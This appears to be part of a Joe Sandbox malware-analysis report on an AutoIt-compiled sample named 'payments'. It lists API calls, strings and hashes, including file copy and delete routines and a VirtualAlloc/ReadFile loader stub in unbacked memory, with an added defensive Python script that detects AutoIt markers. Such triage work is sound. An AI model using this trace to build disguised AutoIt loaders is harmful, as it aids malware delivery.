                                                                                                                          • API String ID: 3896587723-2766056989

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • _wcscpy.LIBCMT ref: 00CDFA96
                                                                                                                          • _wcschr.LIBCMT ref: 00CDFAA4
                                                                                                                          • _wcscpy.LIBCMT ref: 00CDFABB
                                                                                                                          • _wcscat.LIBCMT ref: 00CDFACA
                                                                                                                          • _wcscat.LIBCMT ref: 00CDFAE8
                                                                                                                          • _wcscpy.LIBCMT ref: 00CDFB09
                                                                                                                          • __wsplitpath.LIBCMT ref: 00CDFBE6
                                                                                                                          • _wcscpy.LIBCMT ref: 00CDFC0B
                                                                                                                          • _wcscpy.LIBCMT ref: 00CDFC1D
                                                                                                                          • _wcscpy.LIBCMT ref: 00CDFC32
                                                                                                                          • _wcscat.LIBCMT ref: 00CDFC47
                                                                                                                          • _wcscat.LIBCMT ref: 00CDFC59
                                                                                                                          • _wcscat.LIBCMT ref: 00CDFC6E
                                                                                                                            • Part of subcall function 00CDBFA4: _wcscmp.LIBCMT ref: 00CDC03E
                                                                                                                            • Part of subcall function 00CDBFA4: __wsplitpath.LIBCMT ref: 00CDC083
                                                                                                                            • Part of subcall function 00CDBFA4: _wcscpy.LIBCMT ref: 00CDC096
                                                                                                                            • Part of subcall function 00CDBFA4: _wcscat.LIBCMT ref: 00CDC0A9
                                                                                                                            • Part of subcall function 00CDBFA4: __wsplitpath.LIBCMT ref: 00CDC0CE
                                                                                                                            • Part of subcall function 00CDBFA4: _wcscat.LIBCMT ref: 00CDC0E4
                                                                                                                            • Part of subcall function 00CDBFA4: _wcscat.LIBCMT ref: 00CDC0F7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                          • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                          • API String ID: 2955681530-2806939583
                                                                                                                          • Opcode ID: d538457643535be6d67d2c59026689259b22b625d01c77b0bd1f9c408a98fc97
                                                                                                                          • Instruction ID: 9951d694d823de8b94bb53348635b1d89bbf8e558dc2dbe4e698740ba256c2a5
                                                                                                                          • Opcode Fuzzy Hash: d538457643535be6d67d2c59026689259b22b625d01c77b0bd1f9c408a98fc97
                                                                                                                          • Instruction Fuzzy Hash: B391A271504605AFDF20EF64C895E9BB3E8BF84310F00486EF959972A1DB31EA49DB92
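The function above walks the sample with wide-character CRT calls (_wcschr, _wcscpy, _wcscat, __wsplitpath) and references the string ">>>AUTOIT SCRIPT<<<", the marker a compiled AutoIt3 executable carries in front of its embedded script. The following triage check is an added example, not code from this report or from AutoIt: it searches a file for that marker and for the "AutoIt v3 GUI" window-class string the RegisterClassExW block below registers. Assumptions: because the referencing function uses wide-char routines, the marker is matched as UTF-16LE, with an ASCII match as a fallback; the sample buffer is constructed for the example and is not a real PE.

```python
# Added example, not code from the Joe Sandbox report or from AutoIt itself.
# Checks a sample for the compiled-AutoIt strings the report lists:
#   ">>>AUTOIT SCRIPT<<<"  (referenced by the wide-char CRT function above)
#   "AutoIt v3 GUI"        (window class registered via RegisterClassExW below)
# Assumption: the marker is stored as UTF-16LE (the referencing code uses
# _wcschr/_wcscpy/_wcscat); an ASCII hit is checked too, as a fallback.
from __future__ import annotations

AUTOIT_MARKER = ">>>AUTOIT SCRIPT<<<"
AUTOIT_WINDOW_CLASS = "AutoIt v3 GUI"


def _all_offsets(haystack: bytes, needle: bytes) -> list[int]:
    """Every byte offset at which needle occurs in haystack (non-overlapping)."""
    offsets, start = [], 0
    while True:
        i = haystack.find(needle, start)
        if i < 0:
            return offsets
        offsets.append(i)
        start = i + len(needle)


def find_autoit_markers(data: bytes) -> dict[str, list[int]]:
    """Offsets of each marker encoding; an empty list means 'not found'."""
    return {
        "marker_utf16": _all_offsets(data, AUTOIT_MARKER.encode("utf-16-le")),
        "marker_ascii": _all_offsets(data, AUTOIT_MARKER.encode("ascii")),
        "class_utf16": _all_offsets(data, AUTOIT_WINDOW_CLASS.encode("utf-16-le")),
        "class_ascii": _all_offsets(data, AUTOIT_WINDOW_CLASS.encode("ascii")),
    }


def is_compiled_autoit(data: bytes) -> bool:
    """True if the script marker is present in either encoding.

    The window-class string alone is weaker evidence (any AutoIt3 runtime
    registers it, script or not), so it is reported but not required.
    """
    hits = find_autoit_markers(data)
    return bool(hits["marker_utf16"] or hits["marker_ascii"])


def scan_file(path: str) -> dict[str, object]:
    """Read a file from disk and summarise the marker hits."""
    with open(path, "rb") as fh:
        data = fh.read()
    return {"compiled_autoit": is_compiled_autoit(data),
            "hits": find_autoit_markers(data)}


# Constructed sample buffer (not a real PE): an MZ stub, the runtime's
# window-class name at offset 64 and the UTF-16LE script marker at offset 106.
SAMPLE = (
    b"MZ" + b"\x00" * 62
    + AUTOIT_WINDOW_CLASS.encode("utf-16-le") + b"\x00" * 16
    + AUTOIT_MARKER.encode("utf-16-le") + b"\x00\x00"
)

if __name__ == "__main__":
    print(is_compiled_autoit(SAMPLE), find_autoit_markers(SAMPLE))
```

A hit only tells you the file is an AutoIt3 wrapper; the embedded script (and whatever it drops or injects) still has to be extracted from the data that follows the marker, which this check does not attempt.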

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00C93F86
                                                                                                                          • RegisterClassExW.USER32(00000030), ref: 00C93FB0
                                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C93FC1
                                                                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 00C93FDE
                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C93FEE
                                                                                                                          • LoadIconW.USER32(000000A9), ref: 00C94004
                                                                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C94013
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                          • API String ID: 2914291525-1005189915
                                                                                                                          • Opcode ID: 496162ba6301b54b79a1785b4d316d7612c52ed4ca022aeac8de10b23c3a6e83
                                                                                                                          • Instruction ID: 704d6ce059b3fd030d08398ba481071d76e0bfc92a55fc825b0dff327e0284ef
                                                                                                                          • Opcode Fuzzy Hash: 496162ba6301b54b79a1785b4d316d7612c52ed4ca022aeac8de10b23c3a6e83
                                                                                                                          • Instruction Fuzzy Hash: 2821A9B9900319AFDB00DFA4E849BCDBBB5FB08705F10821AF915E63A0DBB54545CFA1

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CDBDB4: __time64.LIBCMT ref: 00CDBDBE
                                                                                                                            • Part of subcall function 00C94517: _fseek.LIBCMT ref: 00C9452F
                                                                                                                          • __wsplitpath.LIBCMT ref: 00CDC083
                                                                                                                            • Part of subcall function 00CB1DFC: __wsplitpath_helper.LIBCMT ref: 00CB1E3C
                                                                                                                          • _wcscpy.LIBCMT ref: 00CDC096
                                                                                                                          • _wcscat.LIBCMT ref: 00CDC0A9
                                                                                                                          • __wsplitpath.LIBCMT ref: 00CDC0CE
                                                                                                                          • _wcscat.LIBCMT ref: 00CDC0E4
                                                                                                                          • _wcscat.LIBCMT ref: 00CDC0F7
                                                                                                                          • _wcscmp.LIBCMT ref: 00CDC03E
                                                                                                                            • Part of subcall function 00CDC56D: _wcscmp.LIBCMT ref: 00CDC65D
                                                                                                                            • Part of subcall function 00CDC56D: _wcscmp.LIBCMT ref: 00CDC670
                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CDC2A1
                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CDC338
                                                                                                                          • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CDC34E
                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CDC35F
                                                                                                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CDC371
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2378138488-0
                                                                                                                          • Opcode ID: 960cc07c7d33890a9c315ec54b50d985b5fabf837631380573368f3489c37e6d
                                                                                                                          • Instruction ID: bfbf349372b07bb488d9b6e0a8528e480318b91b24b69db3b018f4fa887ea0b9
                                                                                                                          • Opcode Fuzzy Hash: 960cc07c7d33890a9c315ec54b50d985b5fabf837631380573368f3489c37e6d
                                                                                                                          • Instruction Fuzzy Hash: 84C13BB1900219AFDF11DF95CC85EDEBBBDAF49310F1080AAF609E6251DB309A45DF61

                                                                                                                          Control-flow Graph
                                                                                                                          • Graph image not reproduced. Recoverable node data: basic blocks 00C93742-00C93845 and 00D01DA3-00D01EA2 of the window procedure, with API nodes PostQuitMessage, DefWindowProcW, SetTimer, RegisterWindowMessageW, CreatePopupMenu, KillTimer, MoveWindow and SetFocus (Executed / Not Executed colouring lost).
                                                                                                                          APIs
                                                                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00C937B3
                                                                                                                          • KillTimer.USER32(?,00000001), ref: 00C937DD
                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C93800
                                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C9380B
                                                                                                                          • CreatePopupMenu.USER32 ref: 00C9381F
                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00C9382E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                          • String ID: TaskbarCreated
                                                                                                                          • API String ID: 129472671-2362178303
                                                                                                                          • Opcode ID: 31a0ae6dda9c1cdeb7b3553a2d560da32644b3df8ac8a8ab7619dfbde149daa0
                                                                                                                          • Instruction ID: 227e6188a19e651e8be95d18a5c1aad3943ad6256bf4da2607b4c7a479a6d5a6
                                                                                                                          • Opcode Fuzzy Hash: 31a0ae6dda9c1cdeb7b3553a2d560da32644b3df8ac8a8ab7619dfbde149daa0
                                                                                                                          • Instruction Fuzzy Hash: 1341E2F920439AABDF149BACDE4EFBA3696FB04302F444115FD16D22D1CB609E509771

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00C93E79
                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00C93E88
                                                                                                                          • LoadIconW.USER32(00000063), ref: 00C93E9E
                                                                                                                          • LoadIconW.USER32(000000A4), ref: 00C93EB0
                                                                                                                          • LoadIconW.USER32(000000A2), ref: 00C93EC2
                                                                                                                            • Part of subcall function 00C94024: LoadImageW.USER32(00C90000,00000063,00000001,00000010,00000010,00000000), ref: 00C94048
                                                                                                                          • RegisterClassExW.USER32(?), ref: 00C93F30
                                                                                                                            • Part of subcall function 00C93F53: GetSysColorBrush.USER32(0000000F), ref: 00C93F86
                                                                                                                            • Part of subcall function 00C93F53: RegisterClassExW.USER32(00000030), ref: 00C93FB0
                                                                                                                            • Part of subcall function 00C93F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C93FC1
                                                                                                                            • Part of subcall function 00C93F53: InitCommonControlsEx.COMCTL32(?), ref: 00C93FDE
                                                                                                                            • Part of subcall function 00C93F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C93FEE
                                                                                                                            • Part of subcall function 00C93F53: LoadIconW.USER32(000000A9), ref: 00C94004
                                                                                                                            • Part of subcall function 00C93F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C94013
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                          • String ID: #$0$AutoIt v3
                                                                                                                          • API String ID: 423443420-4155596026
                                                                                                                          • Opcode ID: 08dde83c320935dad876de76a02daf9f4b14b792905455f46493523f93386361
                                                                                                                          • Instruction ID: f66afd955377ef40fa79edf9f70889e47bfb18d4a714556faeda322ca1846bae
                                                                                                                          • Opcode Fuzzy Hash: 08dde83c320935dad876de76a02daf9f4b14b792905455f46493523f93386361
                                                                                                                          • Instruction Fuzzy Hash: 46212AB8D40344ABDB00DFA9EC49B9DBBF5EB48311F00816AEA15E23A0D7754645CBB1

                                                                                                                          Control-flow Graph
                                                                                                                          • Graph image not reproduced. Recoverable node data: basic blocks 00CBACB3-00CBAF57 of the CRT startup routine, with calls to 00CB6AC0, 00CB7CF4, 00CB6986, 00CBE880, 00CB6B05 and 00CBAF58 and API nodes GetStartupInfoW, GetStdHandle, GetFileType and InitializeCriticalSectionAndSpinCount (Executed / Not Executed colouring lost).
                                                                                                                          APIs
                                                                                                                          • __lock.LIBCMT ref: 00CBACC1
                                                                                                                            • Part of subcall function 00CB7CF4: __mtinitlocknum.LIBCMT ref: 00CB7D06
                                                                                                                            • Part of subcall function 00CB7CF4: EnterCriticalSection.KERNEL32(00000000,?,00CB7ADD,0000000D), ref: 00CB7D1F
                                                                                                                          • __calloc_crt.LIBCMT ref: 00CBACD2
                                                                                                                            • Part of subcall function 00CB6986: __calloc_impl.LIBCMT ref: 00CB6995
                                                                                                                            • Part of subcall function 00CB6986: Sleep.KERNEL32(00000000,000003BC,00CAF507,?,0000000E), ref: 00CB69AC
                                                                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00CBACED
                                                                                                                          • GetStartupInfoW.KERNEL32(?,00D46E28,00000064,00CB5E91,00D46C70,00000014), ref: 00CBAD46
                                                                                                                          • __calloc_crt.LIBCMT ref: 00CBAD91
                                                                                                                          • GetFileType.KERNEL32(00000001), ref: 00CBADD8
                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00CBAE11
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1426640281-0
                                                                                                                          • Opcode ID: 8bbab121cb0d49cd42624f046993cbf3cc45fe898ed310905ea874142ab7a81f
                                                                                                                          • Instruction ID: 3c52d5d0f712269700b2e3a7d58d678a45f815c92cd44b8529afbb72274a834a
                                                                                                                          • Opcode Fuzzy Hash: 8bbab121cb0d49cd42624f046993cbf3cc45fe898ed310905ea874142ab7a81f
                                                                                                                          • Instruction Fuzzy Hash: 88819D719053459FDB24CFA8C8805E9BBF0AF0A325F24426DD4A6EB3D1D7349903CB66

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 1084 10ad330-10ad3de call 10aad40 1087 10ad3e5-10ad40b call 10ae240 CreateFileW 1084->1087 1090 10ad40d 1087->1090 1091 10ad412-10ad422 1087->1091 1092 10ad55d-10ad561 1090->1092 1096 10ad429-10ad443 VirtualAlloc 1091->1096 1097 10ad424 1091->1097 1094 10ad5a3-10ad5a6 1092->1094 1095 10ad563-10ad567 1092->1095 1098 10ad5a9-10ad5b0 1094->1098 1099 10ad569-10ad56c 1095->1099 1100 10ad573-10ad577 1095->1100 1103 10ad44a-10ad461 ReadFile 1096->1103 1104 10ad445 1096->1104 1097->1092 1105 10ad5b2-10ad5bd 1098->1105 1106 10ad605-10ad61a 1098->1106 1099->1100 1101 10ad579-10ad583 1100->1101 1102 10ad587-10ad58b 1100->1102 1101->1102 1109 10ad59b 1102->1109 1110 10ad58d-10ad597 1102->1110 1111 10ad468-10ad4a8 VirtualAlloc 1103->1111 1112 10ad463 1103->1112 1104->1092 1113 10ad5bf 1105->1113 1114 10ad5c1-10ad5cd 1105->1114 1107 10ad62a-10ad632 1106->1107 1108 10ad61c-10ad627 VirtualFree 1106->1108 1108->1107 1109->1094 1110->1109 1115 10ad4aa 1111->1115 1116 10ad4af-10ad4ca call 10ae490 1111->1116 1112->1092 1113->1106 1117 10ad5cf-10ad5df 1114->1117 1118 10ad5e1-10ad5ed 1114->1118 1115->1092 1124 10ad4d5-10ad4df 1116->1124 1120 10ad603 1117->1120 1121 10ad5fa-10ad600 1118->1121 1122 10ad5ef-10ad5f8 1118->1122 1120->1098 1121->1120 1122->1120 1125 10ad512-10ad526 call 10ae2a0 1124->1125 1126 10ad4e1-10ad510 call 10ae490 1124->1126 1132 10ad52a-10ad52e 1125->1132 1133 10ad528 1125->1133 1126->1124 1134 10ad53a-10ad53e 1132->1134 1135 10ad530-10ad534 CloseHandle 1132->1135 1133->1092 1136 10ad54e-10ad557 1134->1136 1137 10ad540-10ad54b VirtualFree 1134->1137 1135->1134 1136->1087 1136->1092 1137->1136
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 010AD401
                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010AD627
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1359173157.00000000010AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 010AA000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10aa000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFileFreeVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 204039940-0
                                                                                                                          • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                          • Instruction ID: b61bf88624641abddec9ef5d4239931683a0df6162225e59721aa8d1c29d9f12
                                                                                                                          • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                          • Instruction Fuzzy Hash: 5BA10770E00209EBDB14CFE8C894BEEBBB5BF48304F608599E245BB281D7759A81CF54

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 1193 c949fb-c94a25 call c9bcce RegOpenKeyExW 1196 c94a2b-c94a2f 1193->1196 1197 d041cc-d041e3 RegQueryValueExW 1193->1197 1198 d041e5-d04222 call caf4ea call c947b7 RegQueryValueExW 1197->1198 1199 d04246-d0424f RegCloseKey 1197->1199 1204 d04224-d0423b call c96a63 1198->1204 1205 d0423d-d04245 call c947e2 1198->1205 1204->1205 1205->1199
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00C94A1D
                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00D041DB
                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00D0421A
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00D04249
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: QueryValue$CloseOpen
                                                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                          • API String ID: 1586453840-614718249
                                                                                                                          • Opcode ID: 41d6b9c3e3edbf25183d758ae5471c262405673143a91ef2412d82408ae20d51
                                                                                                                          • Instruction ID: 48a02b3be15dafd958ceda07c98873602a0615c8579f1a4cc45112c257b6f145
                                                                                                                          • Opcode Fuzzy Hash: 41d6b9c3e3edbf25183d758ae5471c262405673143a91ef2412d82408ae20d51
                                                                                                                          • Instruction Fuzzy Hash: F4113D71600219BEEB04EBA4DD8AEEF7BBDEF19344F004059B506D6191EB70AE06E760

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 1220 c936b8-c93728 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                          APIs
                                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C936E6
                                                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C93707
                                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,00C93AA3,?), ref: 00C9371B
                                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,00C93AA3,?), ref: 00C93724
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CreateShow
                                                                                                                          • String ID: AutoIt v3$edit
                                                                                                                          • API String ID: 1584632944-3779509399
                                                                                                                          • Opcode ID: 8ff21b714144dbdd8934dc7e6978c9f548775eb882093ab7532c22cda7dd0256
                                                                                                                          • Instruction ID: 62463181b4f96f3f2aeff53afcf2946de78bf6f91a1289af824e8109a479b8e5
                                                                                                                          • Opcode Fuzzy Hash: 8ff21b714144dbdd8934dc7e6978c9f548775eb882093ab7532c22cda7dd0256
                                                                                                                          • Instruction Fuzzy Hash: 9CF0B7795403907AE721575BAC08F673E7EE7D6F65B00411ABE05E22E0C6650895DAB0

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C922A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00C924F1), ref: 00C92303
                                                                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C925A1
                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00C92618
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00D0503A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Handle$CloseInitializeMessageRegisterWindow
